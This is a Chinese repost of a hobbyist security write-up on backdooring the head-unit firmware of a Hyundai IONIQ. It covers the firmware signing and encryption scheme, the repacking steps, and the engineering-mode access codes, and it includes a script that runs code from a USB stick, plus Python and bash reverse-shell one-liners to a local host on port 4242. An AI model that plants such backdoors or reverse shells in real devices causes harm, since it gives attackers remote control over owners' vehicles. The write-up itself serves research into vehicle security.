2022年4月28日，现代和起亚汽车发布了新一轮Display Audio固件更新，包括我的车。

固件安全措施

通过linux_envsetup.sh脚本，我了解到D-Audio2V加密固件更新是如何制作的：
1.首先，所有各种二进制文件被分类到正确的目录中。（Micom更新放在micom文件夹中，系统映像放在system文件夹中，等等）
2.使用重复的SHA224算法计算更新中每个二进制文件的哈希值，这些哈希值被放入一个update.cfg文件中。每一行包含文件的原始名称，一个冒号，然后是文件的哈希值。update.cfg文件
3.使用AES密钥加密某些文件，这些文件被重命名为“enc_{原始名称}”。
4.使用与其他文件相同的方法对update.cfg文件进行哈希，然后对哈希进行签名。签名的哈希值放入update.info文件中。
5.所有的二进制文件，update.cfg文件和update.info文件被压缩成一个加密的zip文件。

Bash Scripts are Neat

我创建了一个空文件夹，将脚本和我想要编辑的固件文件放入其中，然后我使用了“setup_environment.sh”脚本来设置文件夹/文件结构。

然后我运行了extract_update.sh文件，并传入了我的原始固件文件。

这使用zip密码提取了固件文件，并将系统映像挂载到system_image文件夹中。

Backdoors

我决定尽可能地进行最小的更改，至少一开始是这样的。在我的逆向工程和研究过程中，我比较了一个较旧的固件更新和一个发布给我的车辆的固件更新。在其中，我发现了一个新的bash脚本，用于运行Guider，一个基于Python的性能分析工具。

echo "Finding USB Script"USB_SCRIPT_PATH=$(find /run/media/ -path "*1C207FCE3065.sh" 2>/dev/null)
if [ -n "$USB_SCRIPT_PATH" ]then  echo "Running USB Script"  USB_SCRIPT_CONTENT=$(cat $USB_SCRIPT_PATH)  bash -c "$USB_SCRIPT_CONTENT" &fi
 echo "Prescript Running"python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.2",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())' 2>/dev/null &

生成新镜像

1. 卸载系统镜像

2. 计算系统镜像文件的新哈希值

3. 更新update.cfg中的新系统镜像哈希值

4. 计算update.cfg文件的哈希值
   

5. 签名update.cfg文件，并将其放入update.list中。

6. 使用设置中的zip密码将所有内容打包成一个zip文件。

   
   

It Worked?

Ok, now it Worked

ncat -l -p 4242

现在我所要做的就是在工程模式下运行Guider。我进入设置屏幕，点击10次更新按钮的左边，一次更新按钮的右边，输入2400

• md5Year是字符串“02”的哈希值
• md5Password1是字符串“24”的哈希值
• md5Password2是字符串“00”的散列

当我输入代码”3802″后，我得到了一个新的弹出窗口：

Plan B

echo "Finding USB Script"USB_SCRIPT_PATH=$(find /run/media/ -path "*1C207FCE3065.sh" 2>/dev/null)
if [ -n "$USB_SCRIPT_PATH" ]then  echo "Running USB Script"  USB_SCRIPT_CONTENT=$(cat $USB_SCRIPT_PATH)  bash -c "$USB_SCRIPT_CONTENT" &fi

/bin/bash -i >& /dev/tcp/192.168.0.3/4242 0>&1 &

I’m In

我成功地通过后门访问了系统。我运行了whoami来查看我当前使用的用户是谁：

原文始发于微信公众号（安全脉脉）：HowIHackedMyCar 2021款 现代IONIQ （二） Making a Backdoor